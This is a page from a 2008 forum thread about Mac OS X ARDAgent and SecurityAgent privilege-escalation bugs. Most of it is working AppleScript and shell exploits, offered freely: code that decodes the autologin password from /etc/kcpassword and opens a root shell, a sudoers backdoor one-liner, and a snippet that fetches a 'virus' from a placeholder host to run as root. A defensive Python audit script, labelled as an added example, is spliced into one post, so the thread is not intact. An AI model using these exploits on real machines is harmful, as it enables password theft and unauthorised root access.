IPB


Page 60 of 69 (posts #591 to #600)
remote login Trojan, Trying to make a program that will select remote login.
Nilkimas
post Jun 25 2008, 03:08 AM
Post #591
Group: Staff
Posts: 792
Joined: 30-August 05
From: Old Europe
Member No.: 3984

And before I forget, congratulations Oktane and everybody on the code, great job!


--------------------
|-------------------------|
|‘ _.·«-<nilkiimas>»//·._.·´¯¯¯‘'\_____\STK/
|____________|
Skratz0r
post Jun 25 2008, 03:29 AM
Post #592
Group: Members
Posts: 40
Joined: 17-May 08
Member No.: 12015

'sploit won't work on my comp. I suppose I shouldn't be so annoyed. :-P
But damn, I can't test it.


--------------------
tim: woah, this is wierd. Its like a live bash.org!
* Skrat has kicked tim from #chat (Noob.)
Skratz0r
post Jun 25 2008, 06:57 AM
Post #593
Group: Members
Posts: 40
Joined: 17-May 08
Member No.: 12015

QUOTE (callmenames @ Jun 21 2008, 10:00 AM)
Still having trouble getting it pinned down but I am able to reproduce it sporadically.

CODE
$ ps -axww | grep Security
5981  ??  S      0:01.27 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent -psn_0_102236161
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)

Then some combination of killing it, running it etc. and....
CODE
ps -axww | grep Security
6198  ??  S      0:01.59 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)


Hmm.
CODE
$ ps -auxww | grep Security
security  6198   0.7  0.4   144740   5896  ??  S     1:53AM   0:01.78 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent

Ok, so at some point it's being launched / relaunched as itself, not as the user... and it appears to not be launched with an argument of a specific psn.

I killed it, after the next two lines...
CODE
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)


Well, I can definitely get it to stop being uid=92 :) As for getting it to be uid=92, that is proving somewhat more elusive.


Perhaps this might ease the testing...?
CODE
tell application "SecurityAgent"
    repeat while (text of (do shell script "whoami")) is not "root"
        
        try
            do shell script "killall SecurityAgent"
            return (text of (do shell script "whoami"))
        end try
        
    end repeat
end tell


Just a thought. :-|
Perhaps you could automate it trying to get itself to run as root.
I doubt mine is the best example there could have been, though.

~ Skrat


--------------------
tim: woah, this is wierd. Its like a live bash.org!
* Skrat has kicked tim from #chat (Noob.)
callmenames
post Jun 25 2008, 07:49 AM
Post #594
Group: Members
Posts: 1426
Joined: 14-October 05
Member No.: 4296

I would like to say thank you to everyone who has participated. I've had so much fun these past few weeks and I'm grateful for the escape from the daily doldrums.

To the forum admins and staff for providing the place and setting the atmosphere. To lokin for starting this whole mess er thread. :) To Oktane both for ideas and for coding in differing directions (which I think is illustrative more than confusing, at least I hope) oh and for the beautiful authentication window replications. :), to Andrew for the courage to ask questions despite occasional teasing and for causing me to #comment / --explain so that anyone at any skill level (hopefully) had a shot at following along. To Wawl for prompt confirmation that the ARDAgent thing wasn't just a sleep-deprivation induced hallucination. :) To NullModem for clarifying /Library/Preferences/com.apple.SystemLoginItems, which has been so often overlooked (ahem.) To Siph0n, for watching over us all and for teaching me everything I know without requiring too many personal 'favors' in return (not that there's anything wrong with that sort of thing. Oh and for the Python and Perl!) :) To MacPunk for catching the SecurityAgent thing (and for reassuring me in #UGM, while the forum was being upgraded.) To Nilkimas for the Cocoa! AWESOME WORK DUDE! :)

And thanks in advance, to everyone who continues to question, to learn and especially to share.

I have re-learned, in the course of this thread, something which I repeatedly forget in life. Which is that while individually we are what we are... collectively, we are more than the sum of our parts.

At the start of this thread, my posts were frequently sarcastic, perhaps even mean. I apologize to anyone whom I may have offended and most especially if I in any way discouraged others from participating. Working with everyone who has been involved has been a pleasure. :)

Other than my own occasionally cranky responses, I have only one regret, which is that I failed to consider the individual people who would be tasked with getting the ARDAgent vulnerability fixed. Some of those people are extremely skilled open-source authors whose software I (and probably many of us here) use regularly. They deserved better from me and I apologize for shooting my mouth off without first remembering that Apple is people too and some of those people might not be so very different from many of us here. In the future, when I post about a vulnerability in Mac OS, everyone in this forum will be the 2nd to hear about it. I encourage you all to give those people, the Mac programmers within Apple, through official channels or otherwise... a bit of warning.

Okay, and an apology to Freaky - you deserve success. Just maybe less flame-bait in the next press release eh? :)

Oh and to the endless supply of utterly unqualified Internet journalists, thanks for all the terrific entertainment. Virtually all of you guys are easily duped, lazy / no fact-checking, FUD-spreading jackasses. If you aren't going to take the time and expend the effort to get the story right, please leave it for the real reporters who will. Thanks.

That said, for those interested in vulns in the AppleEvents arena, ARDAgent is as yet unpatched, SecurityAgent too, and I haven't experimented with it much. There's also a wowzer of a local DOS along similar lines which was pointed out to me by MacPunk (I think?) in the #UGM forum - it's posted on the web somewhere. In other areas, /Library/Receipts is BEGGING to be exploited, which is old news, as are SystemLoginItems and kickstart - all for admins, which is still the default. And I'll reiterate... MOAB, setuid executables in /Applications/Utilities, WRITABLE PATHS. All old news.

'callmenames' will be around for a bit longer and then will suddenly *poof* disappear. Rest assured that I'm never really gone. :)

Post some code! :)

callmenames
post Jun 25 2008, 08:16 AM
Post #595
Group: Members
Posts: 1426
Joined: 14-October 05
Member No.: 4296

More stoopid-easy ARDAgent tricks... Local ARDAgent exploit to read the barely-encoded autologin password saved in /etc/kcpassword and then open a root shell in Terminal. You might also want to try that password on the autologin user's keychain too.
CODE
--This is AppleScript
global kcpassword
set kcpassword to ""

on get_autologin_password()
    try
        tell application "ARDAgent" to do shell script "declare -i offset=0 i=0;declare -a keys=(7d 89 52 23 d2 bc dd ea a3 b9 1f) hexbytes=($(hexdump -v -e '/1 \"%02X \"' /etc/kcpassword));for ((offset=0;offset<${#hexbytes[*]};offset++));do newbyte=$(printf '%02X' $((16#${keys[${i}]}^16#${hexbytes[$offset]})));[ \"${newbyte}\" == \"00\" ]&&echo&&break;echo -en \"\\x${newbyte}\";let i+=1;[ $i -gt 10 ]&&let i=0;done"
        set kcpassword to the result
    on error
        get_autologin_password()
    end try
end get_autologin_password

get_autologin_password()
tell application "Terminal" to do script "echo " & quoted form of kcpassword & " | /usr/bin/sudo -S id; exec /usr/bin/sudo /bin/bash -i"

Oh and incidentally, please steal this code! :) And anything else I've posted too, take it, use it, claim it, improve it, rewrite it, post it!
Skratz0r
post Jun 25 2008, 08:34 AM
Post #596
Group: Members
Posts: 40
Joined: 17-May 08
Member No.: 12015

QUOTE
... In other areas, /Library/Receipts is BEGGING to be exploited ...

How?


--------------------
tim: woah, this is wierd. Its like a live bash.org!
* Skrat has kicked tim from #chat (Noob.)
callmenames
post Jun 25 2008, 08:51 AM
Post #597
Group: Members
Posts: 1426
Joined: 14-October 05
Member No.: 4296

When Disk Utility (GUI) or diskutil (command line) performs a repair permissions, it reads what the proper permissions should be from the receipts stored in /Library/Receipts. This has been posted in various places on the Interweb for years. This gentleman did a nice bit of work in the area recently: http://blogs.sun.com/jone/entry/apple_s_ardagent_suid_hole :)
Skratz0r
post Jun 25 2008, 08:56 AM
Post #598
Group: Members
Posts: 40
Joined: 17-May 08
Member No.: 12015

You could always do something of this ilk...

CODE
-- Downloads an architecture specific virus
set arch to get text of (do shell script "uname -p")
do shell script "curl http://somehost.com/game-" & arch
-- Tell ARDagent to execute the virus game-<arch> as root here


The problem would be finding where to host it, though.

~ Skrat

This post has been edited by Skratz0r: Jun 25 2008, 08:56 AM


--------------------
tim: woah, this is wierd. Its like a live bash.org!
* Skrat has kicked tim from #chat (Noob.)
callmenames
post Jun 25 2008, 08:56 AM
Post #599
Group: Members
Posts: 1426
Joined: 14-October 05
Member No.: 4296

QUOTE
As you may have read, this flaw is not capable of being exploited remotely

http://theappleblog.com/2008/06/24/unpatch...ommunity-fixes/

Izzat so?

CODE
$ ssh angel@localhost
Password:
Last login: Wed Jun 25 06:16:21 2008
Welcome to Darwin!
$ osacompile -e 'global my_username' -e 'set my_username to system attribute "USER"' -e 'on sudoers()' -e 'try' -e 'tell application "ARDAgent" to do shell script "echo \"" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL\" >> /etc/sudoers"' -e 'on error' -e 'sudoers()' -e 'end try' -e 'end sudoers' -e 'sudoers()' -o for_remote_cli_sessions.app
$ open for_remote_cli_sessions.app/
$ sudo cat /etc/sudoers
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers file.
#

# Host alias specification

# User alias specification

# Cmnd alias specification

# Defaults specification

# Runas alias specification

# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL

# Uncomment to allow people in group wheel to run all commands
# %wheel        ALL=(ALL)       ALL

# Same thing without a password
# %wheel        ALL=(ALL)       NOPASSWD: ALL

# Samples
# %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
# %users  localhost=/sbin/shutdown -h now
angel   ALL=(ALL)       NOPASSWD: ALL
$


Yet another clueless Interweb news reporter.

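As an added example (not code from this thread or from any of its posters), the following Python script audits a Mac for three of the local privilege-escalation conditions raised on this page from the defender's side: sudoers grants like the `angel   ALL=(ALL)       NOPASSWD: ALL` line appended in the post above, setuid executables reachable through a group- or world-writable path component (the "setuid executables ... WRITABLE PATHS" point in callmenames' earlier post, and the reason a setuid ARDAgent matters at all), and autologin being enabled (the /etc/kcpassword file the earlier ARDAgent post reads). The sudoers sample and the directory tree built inside demo() are constructed fixtures; the expected-grant set EXPECTED_ALL_GRANTS (root and %admin) is taken from the stock sudoers shown above and is an assumption for any other system. A sticky world-writable directory is deliberately not counted as a weak component, since entries in it can only be renamed or removed by their owner.

```python
#!/usr/bin/env python3
"""Audit for local privilege-escalation conditions discussed in this thread:
unexpected or NOPASSWD sudoers grants, setuid/setgid executables reachable
through a group/world-writable path, and autologin (kcpassword present).
Added example; not code from the thread."""
import os
import re
import shutil
import stat
import tempfile
from typing import Dict, List, Optional, Tuple

# Grants on a stock system, per the `sudo cat /etc/sudoers` output in the thread
# (assumption for other systems: adjust to your own baseline).
EXPECTED_ALL_GRANTS = {"root", "%admin"}

# user-or-group  hosts = (runas) TAG: commands   (Defaults and alias lines are skipped)
SUDOERS_RULE = re.compile(
    r"^\s*(?P<who>[%\w.-]+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)
SKIP_PREFIXES = ("defaults", "host_alias", "user_alias", "cmnd_alias", "runas_alias")


def find_suspicious_sudoers(text: str) -> List[Dict[str, object]]:
    """Return rules that carry NOPASSWD, or grant ALL to a principal outside EXPECTED_ALL_GRANTS."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.lower().startswith(SKIP_PREFIXES):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        who, cmds = m.group("who"), m.group("cmds").strip()
        nopasswd = "NOPASSWD:" in m.group("tags").upper()
        if nopasswd or (cmds == "ALL" and who not in EXPECTED_ALL_GRANTS):
            findings.append({"line": lineno, "who": who, "nopasswd": nopasswd,
                             "cmds": cmds, "text": raw})
    return findings


def _writable_component(path: str, root: str) -> Optional[str]:
    """First component of `path`, from `root` downward, that group or others can write.
    Sticky world-writable directories (e.g. /tmp) are skipped: entries there can
    only be renamed or removed by their owner, so the binary cannot be swapped."""
    comp, chain = root, [root]
    for part in os.path.relpath(path, root).split(os.sep):
        comp = os.path.join(comp, part)
        chain.append(comp)
    for comp in chain:
        st = os.lstat(comp)
        if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
            continue
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return comp
    return None


def find_setuid_in_writable_paths(roots: List[str]) -> List[Tuple[str, str]]:
    """Walk each root (whose own ancestors the caller trusts, e.g. /Applications)
    and report (setuid-or-setgid file, weak path component) pairs."""
    findings = []
    for root in roots:
        root = os.path.abspath(root)
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    weak = _writable_component(path, root)
                    if weak:
                        findings.append((path, weak))
    return findings


def autologin_enabled(etc_dir: str = "/etc") -> bool:
    """Autologin keeps the account password in <etc_dir>/kcpassword under a fixed,
    reversible encoding; its mere presence is the finding. Mitigation: turn autologin off."""
    return os.path.exists(os.path.join(etc_dir, "kcpassword"))


# Constructed sample: the relevant lines of the sudoers output posted above.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
# %wheel        ALL=(ALL)       NOPASSWD: ALL
angel   ALL=(ALL)       NOPASSWD: ALL
"""


def demo() -> Dict[str, object]:
    """Run all three checks against constructed fixtures so the example works offline."""
    tmp = tempfile.mkdtemp()
    try:
        os.chmod(tmp, 0o700)
        safe, shared = os.path.join(tmp, "bin"), os.path.join(tmp, "shared")
        os.mkdir(safe); os.chmod(safe, 0o755)
        os.mkdir(shared); os.chmod(shared, 0o777)  # the weak component
        for d in (safe, shared):
            tool = os.path.join(d, "tool")
            with open(tool, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(tool, 0o4755)  # setuid, like ARDAgent
        open(os.path.join(tmp, "kcpassword"), "w").close()  # simulated autologin
        return {"sudoers": find_suspicious_sudoers(SAMPLE_SUDOERS),
                "setuid": find_setuid_in_writable_paths([tmp]),
                "autologin": autologin_enabled(tmp)}
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real system you would call `find_suspicious_sudoers(open("/etc/sudoers").read())` as root, `find_setuid_in_writable_paths(["/Applications", "/usr/local"])`, and `autologin_enabled()`; the checks are read-only and report, they do not change anything.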
Skratz0r
post Jun 25 2008, 09:00 AM
Post #600
Group: Members
Posts: 40
Joined: 17-May 08
Member No.: 12015

Not everyone has SSH access to the box they want to root, callmenames.
~_~


--------------------
tim: woah, this is wierd. Its like a live bash.org!
* Skrat has kicked tim from #chat (Noob.)
